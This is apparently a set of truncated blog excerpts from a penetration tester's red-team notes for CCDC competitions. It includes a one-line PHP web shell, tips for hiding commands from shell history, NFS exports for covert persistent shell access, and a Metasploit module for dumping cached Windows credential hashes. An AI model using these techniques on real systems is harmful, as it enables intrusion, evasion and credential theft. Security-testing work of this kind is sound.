This is mostly for my memory for CCDC:

<?php system($_GET['cmd']); ?>

I wonder what will happen if an RSS reader doesn’t do proper filtering…
CORRECTION: Thanks to jduck for pointing it out, but you need to actually make a change to get this to work. Reference: http://www.catonmat.net/blog/the-definitive-guide-to-bash-command-line-history/ and search for "Modifying History Behavior". You simply put a space before it:

mubix@localhost:/tmp/demo$ ls -alh
total 8.0K
drwxr-xr-x 2 mubix mubix 4.0K Mar 1 19:43 .
drwxrwxrwt 3 root root 4.0K Mar 1 19:43 ..
-rw-r--r-- 1 mubix mubix 0 Mar 1 19:43 bob
mubix@localhost:/tmp/demo$ cat ~/.
Not sure how far back it goes (Win95?) but 2000, XP and all the way up to Win 7 have a program called DOSKEY:

C:\Users\vmadmin>doskey /?
Edits command lines, recalls Windows commands, and creates macros.

DOSKEY [/REINSTALL] [/LISTSIZE=size] [/MACROS[:ALL | :exename]] [/HISTORY] [/INSERT | /OVERSTRIKE] [/EXENAME=exename] [/MACROFILE=filename] [macroname=[text]]

/REINSTALL      Installs a new copy of Doskey.
/LISTSIZE=size  Sets size of command history buffer.
/MACROS         Displays all Doskey macros.
/MACROS:ALL     Displays all Doskey macros for all executables which have Doskey macros.
Constant connections and odd binaries running on systems usually get caught pretty quickly in CCDC events. However, NFS exports are hardly ever noticed. Setting it up on an Ubuntu/Debian box is a snap, and given the right directory and permissions it can lead you right back to getting a shell any time you want without a constant connection. Plus, NFS blends right in and can listen on TCP and/or UDP (2049). Here is a quick how-to on setting up NFS
(No, I’m not old enough to have used that term when it was the standard.) I believe that this tweet should be archived for reference: http://twitter.com/#!/_ming_se/status/37688231185219584 And for those who don’t get the reference, here is a Pontiac Fiero:
The following are good adds to your DNS brute force list. These are all SRV records, so make sure your type is set correctly. The great thing about SRV records is that they tell you the port in the answer. Isn’t that nice of them? I don’t know of any DNS tools that utilize SRV as part of their process, but scripting dig to do so isn’t tough.

_autodiscover._tcp
_caldav._tcp
_client.
Update: Cachedump has been added to the Metasploit trunk: https://dev.metasploit.com/redmine/projects/framework/repository/revisions/12946

Pull it down: wget http://lab.mediaservice.net/code/cachedump.rb
Put it here: /(metasploitdir)/modules/post/windows/gather
Load up console and pwn something, then (MAKE SURE YOU ARE SYSTEM):

meterpreter > run post/windows/gather/cachedump
[*] Executing module against WORKSTATION244
[*] Obtaining the boot key...
[*] Trying 'XP' style...
[*] Getting PolSecretEncryptionKey...
[*] XP compatible client
[*] Lsa Key: 29249a6480f428cb6dacba2d30d5292c
[*] Getting LK$KM...
[*] Dumping cached credentials...
Username : jdoe
Hash : 592cdfbc3f1ef77ae95c75f851e37166
Last login : 2010-05-11 01:43:48
DNS Domain Name : CONTOSO.
I thought updates went into RSS, but I guess they don’t so this is my “I updated stuff” post: /blog/2009/9/18/password-word-lists/
Thought I would share this video; if it isn’t a swift kick in the pants to do better with your life, I don’t know what is:
In this day and age everyone is worried about the insider threat. Internal Penetration Testing doesn’t really test what would happen if your janitor got paid 50 bucks to put a USB stick in one of your servers. External Penetration Tests are never scoped for that sort of testing. So what is a company to do? How can they know what the risk is? The answer? Usually they guess or assume, mostly because they are scared to find out, it’s happened to them before, or one of a million different justifications.